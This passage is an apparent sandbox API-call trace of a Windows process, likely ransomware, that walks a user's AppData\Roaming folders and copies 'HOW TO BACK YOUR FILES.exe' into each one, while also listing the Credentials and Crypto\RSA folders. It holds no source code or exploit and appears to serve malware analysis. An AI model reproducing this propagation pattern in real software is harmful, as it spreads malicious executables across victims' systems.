[0109.240] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x72260a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x72260a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.240] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.240] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.241] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network" [0109.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0109.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0109.241] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned 63 [0109.241] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network" [0109.241] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.241] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.242] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.242] GetLastError () returned 0x0 [0109.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.242] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.242] CloseHandle (hObject=0x120) returned 1 [0109.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.242] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x508dc260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x508dc260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.242] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.242] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.242] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0109.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0109.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0109.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 75 [0109.243] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0109.243] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.243] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.243] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.244] GetLastError () returned 0x0 [0109.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.244] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.244] CloseHandle (hObject=0x120) returned 1 [0109.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.244] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.244] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x508dc260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x508dc260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.244] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.244] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.244] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0109.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0109.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0109.244] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 79 [0109.244] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0109.244] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.244] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.245] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.245] GetLastError () returned 0x0 [0109.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.245] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.245] CloseHandle (hObject=0x120) returned 1 [0109.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.245] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x508dc260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x508dc260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.246] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.246] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0109.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0109.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project" [0109.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14" [0109.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033" [0109.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC" [0109.248] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0109.248] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0109.248] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0109.249] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E" [0109.249] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC" [0109.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR" [0109.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0" [0109.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0109.251] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0109.251] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0109.251] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0109.252] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0109.252] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0109.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12" [0109.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12" [0109.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel" [0109.254] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0109.254] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0109.254] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0109.255] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14" [0109.255] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto" [0109.256] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0109.256] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0109.256] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials" [0109.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns" [0109.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia" [0109.258] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player" [0109.258] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0109.258] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0109.259] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0109.259] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0109.259] lstrcpynW (in: 